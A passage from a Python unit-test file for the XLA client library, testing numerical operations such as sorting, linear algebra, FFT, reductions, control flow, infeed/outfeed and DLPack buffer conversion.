[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(c, 0,
xla_client.shape_from_pyval(np.array(0, dtype=in_dtype)))
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}".format(FormatShapeAndDtype(shape, dtype),
take_ownership),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
np.testing.assert_array_equal(x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
